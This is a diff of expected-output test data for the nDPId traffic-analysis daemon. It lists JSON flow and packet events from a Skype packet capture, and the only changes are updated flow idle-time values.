+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431970685921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970685921,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoGAJAAEAGKsjAqAEiW77afchUMD4lFgKDetayC1AQIABKwAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1431970686105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686105,"pkt":"0NQSxnP1PBXCt3IOCABFAAAomw4AAEARXEPAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1431970686107,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970686107,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr4AAEABX8fAqAEBwKgBIgMDgJYAAAAARQAAKJsOAABAEVxDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686319,"flow_last_seen":1431970686319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686319,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431970686319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686319,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzaZAAEAGdQvAqAEiW77afchVMD6WWeS2AAAAALAC\/\/89ewAAAgQFtAEDAwUBAQgKPjJPpQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431970686381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686381,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0k+pAAPQG+tJbvtp9wKgBIjA+yFVGmTUullnkt4ASH\/5npwAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1431970686381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686381,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoqoZAAEAGmEPAqAEiW77afchVMD6WWeS3Rpk1L1AQIACoYAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686319,"flow_last_seen":1431970686319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686319,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431970686319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686319,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzaZAAEAGdQvAqAEiW77afchVMD6WWeS2AAAAALAC\/\/89ewAAAgQFtAEDAwUBAQgKPjJPpQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431970686381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686381,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0k+pAAPQG+tJbvtp9wKgBIjA+yFVGmTUullnkt4ASH\/5npwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1431970686381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686381,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoqoZAAEAGmEPAqAEiW77afchVMD6WWeS3Rpk1L1AQIACoYAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431970686624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686624,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoWF8AAEARnvLAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431970686627,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970686627,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr8AAEABX8bAqAEBwKgBIgMDgJYAAAAARQAAKFhfAABAEZ7ywKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} -00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686843,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686843,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686843,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXdpAAEAG5NfAqAEiW77afchWAbv9gi8BAAAAALAC\/\/+4gAAAAgQFtAEDAwUBAQgKPjJRrgAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431970686906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686906,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0rxlAAPQG36Nbvtp9wKgBIgG7yFakF93g\/YIvAoASH\/7ehAAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"} +00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686843,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686843,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686843,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXdpAAEAG5NfAqAEiW77afchWAbv9gi8BAAAAALAC\/\/+4gAAAAgQFtAEDAwUBAQgKPjJRrgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431970686906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686906,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0rxlAAPQG36Nbvtp9wKgBIgG7yFakF93g\/YIvAoASH\/7ehAAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431970687261,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687261,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuS7AAAEAREzPAqAEirjGr4DLdfQsAGuTOfB8CfeyODsgiOuU1SIeok9yn"} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -815,156 +815,156 @@ 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOf4AAEAROozAqAEivbyGrjLdV6QAGoKkfCUCWKDpreHeWqMtL4LNh6CD"} 00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABADkBAAEAGGvXAqAEiR+4Hy8hZSU+Qnyq6AAAAALAC\/\/\/FaAAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtDFAAEAGA+fAqAEiBfi63chaeSLm2Z5sAAAAALAC\/\/9aigAAAgQFtAEDAwUBAQgKPjJU3QAAAAAEAgAA"} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1431970687774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687774,"pkt":"PBXCt3IO0NQSxnP1CABFAABA71RAAHIGlsMF+LrdwKgBInkiyFqd8pp25tmebbASRBBwGwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1431970687774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687774,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QypAAEAGdPrAqAEiBfi63chaeSLm2Z5tnfKad4AQECxRTAAAAQEICj4yVUQAAAAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431970687881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687881,"pkt":"PBXCt3IO0NQSxnP1CABFAABArt9AAHMGR1VH7gfLwKgBIklPyFnlnJYLkJ8qu7AS\/\/\/byQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431970687881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687881,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JOpAAEAGBFfAqAEiR+4Hy8hZSU+Qnyq75ZyWDIAQECx4gAAAAQEICj4yVa4AAAAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1431970687953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970687953,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyFgS\/h6Xx3QlqKAScSDnSgAAAgQFrAQCCAq+r7gZPjJU3AEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABADkBAAEAGGvXAqAEiR+4Hy8hZSU+Qnyq6AAAAALAC\/\/\/FaAAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtDFAAEAGA+fAqAEiBfi63chaeSLm2Z5sAAAAALAC\/\/9aigAAAgQFtAEDAwUBAQgKPjJU3QAAAAAEAgAA"} 